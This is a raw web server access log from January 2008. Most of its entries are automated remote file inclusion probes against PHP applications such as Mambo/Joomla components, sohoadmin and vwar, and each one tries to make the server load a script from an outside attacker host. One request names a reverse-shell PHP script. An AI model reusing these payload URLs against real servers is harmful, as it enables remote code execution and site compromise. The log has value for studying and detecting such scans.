218.103.8.225 - - [27/Jan/2008:17:49:13 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:17:49:17 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [27/Jan/2008:17:49:30 -0800] "GET /logs/access.log//auto.php?inc=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [27/Jan/2008:17:49:30 -0800] "GET /logs//auto.php?inc=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:50:38 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:50:38 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:50:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
195.242.3.251 - - [27/Jan/2008:17:50:42 -0800] "GET /logs/access_071210.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://lurejewelry.com/12all/admin/images/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:50:48 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:51:08 -0800] "GET /logs/access_070827.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:51:08 -0800] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:51:08 -0800] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:51:09 -0800] "GET /logs/access_071217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:51:35 -0800] "GET /logs/access_070826.log//sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
150.161.5.91 - - [27/Jan/2008:17:51:51 -0800] "GET /logs/access_070826.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
150.161.5.91 - - [27/Jan/2008:17:51:52 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
150.161.5.91 - - [27/Jan/2008:17:51:52 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:52:06 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:52:06 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:52:07 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.85.98.2 - - [27/Jan/2008:17:52:28 -0800] "GET /logs/access_070827.log//auto.php?inc=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.24.226 - - [27/Jan/2008:17:52:51 -0800] "GET /logs/ HTTP/1.0" 200 5749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:53:19 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:53:20 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:53:20 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:53:27 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:53:33 -0800] "GET /logs/access_070827.log//sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:53:33 -0800] "GET //sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:53:33 -0800] "GET /logs//sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:55:03 -0800] "GET /logs/access_071224.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:55:13 -0800] "GET /logs/access_070826.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:17:55:29 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:56:04 -0800] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:56:04 -0800] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:17:57:48 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:17:58:01 -0800] "GET /logs/access_070826.log//sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:58:02 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.38.184.28 - - [27/Jan/2008:17:58:24 -0800] "GET /main.php?x=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.184.28 - - [27/Jan/2008:17:58:25 -0800] "GET /logs/main.php?x=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:59:07 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:59:18 -0800] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:59:18 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.96.247.163 - - [27/Jan/2008:17:59:34 -0800] "GET /logs/access_080107.log/index.php?go=http://scottmouse.no-ip.biz/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.96.247.163 - - [27/Jan/2008:17:59:35 -0800] "GET /logs/index.php?go=http://scottmouse.no-ip.biz/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.96.247.163 - - [27/Jan/2008:17:59:41 -0800] "GET /logs/access_070826.log/index.php?go=http://scottmouse.no-ip.biz/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:59:49 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:59:49 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:17:59:54 -0800] "GET /logs/access_071210.log//admin/stats.php/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:18:00:05 -0800] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.44.95 - - [27/Jan/2008:18:00:07 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:18:00:26 -0800] "GET /logs/access_070827.log//admin/stats.php/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:18:01:37 -0800] "GET /logs/access_071210.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:02:34 -0800] "GET /logs/access_070827.log//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:18:02:47 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.140.91.131 - - [27/Jan/2008:18:03:59 -0800] "GET /logs//include/scormExport.inc.php?includePath=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.140.91.131 - - [27/Jan/2008:18:03:59 -0800] "GET //include/scormExport.inc.php?includePath=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.107 - - [27/Jan/2008:18:04:48 -0800] "GET /logs//include/scormExport.inc.php?includePath=http://weblime.ru/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.107 - - [27/Jan/2008:18:04:49 -0800] "GET //include/scormExport.inc.php?includePath=http://weblime.ru/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:18:05:20 -0800] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.28.31 - - [27/Jan/2008:18:05:36 -0800] "GET /logs/access_080128.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:06:15 -0800] "GET /logs/access_070826.log//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
38.101.72.8 - - [27/Jan/2008:18:06:17 -0800] "GET /logs/access_071224.log//index.php?cal=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
38.101.72.8 - - [27/Jan/2008:18:06:17 -0800] "GET //index.php?cal=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
38.101.72.8 - - [27/Jan/2008:18:06:17 -0800] "GET /logs//index.php?cal=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:18:07:19 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:18:07:20 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:07:20 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:07:20 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:07:55 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:07:55 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.116.37.218 - - [27/Jan/2008:18:08:18 -0800] "GET /logs/index.php?id=http://no.spam.ee/~tonu/phpshell/CMD.txt%20(compiles%20a%20reverse%20shell).txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.116.37.218 - - [27/Jan/2008:18:08:18 -0800] "GET /index.php?id=http://no.spam.ee/~tonu/phpshell/CMD.txt%20(compiles%20a%20reverse%20shell).txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:08:21 -0800] "GET /logs/access_070827.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:08:21 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.131.106.16 - - [27/Jan/2008:18:08:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [27/Jan/2008:18:08:36 -0800] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:10:43 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:10:44 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:11:26 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.161.5.91 - - [27/Jan/2008:18:11:54 -0800] "GET /logs/access_071224.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:12:41 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:12:41 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.234.1.78 - - [27/Jan/2008:18:12:54 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.234.1.78 - - [27/Jan/2008:18:12:55 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:13:15 -0800] "GET /logs/access_071217.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:13:16 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:13:16 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:13:18 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://happystation.biz/Smileys/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:15:47 -0800] "GET /logs/access_071105.log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.radioung.no/pics/www/chika????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:15:47 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.radioung.no/pics/www/chika????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:15:47 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.radioung.no/pics/www/chika????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.233.130.210 - - [27/Jan/2008:18:17:26 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
87.233.130.210 - - [27/Jan/2008:18:17:27 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
67.195.44.94 - - [27/Jan/2008:18:17:36 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.8.75 - - [27/Jan/2008:18:17:42 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.68.149 - - [27/Jan/2008:18:17:48 -0800] "GET /logs/access_071224.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.68.149 - - [27/Jan/2008:18:17:48 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.68.149 - - [27/Jan/2008:18:17:57 -0800] "GET /logs/access_070827.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:18:08 -0800] "GET /logs/access_071210.log//inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:18:08 -0800] "GET //inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:18:08 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:18:09 -0800] "GET /logs/access_071210.log//inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:18:09 -0800] "GET //inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:18:09 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.190.51.202 - - [27/Jan/2008:18:18:20 -0800] "GET /logs/access_071217.log/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:18:30 -0800] "GET /logs/access_080107.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.192.239.66 - - [27/Jan/2008:18:19:01 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
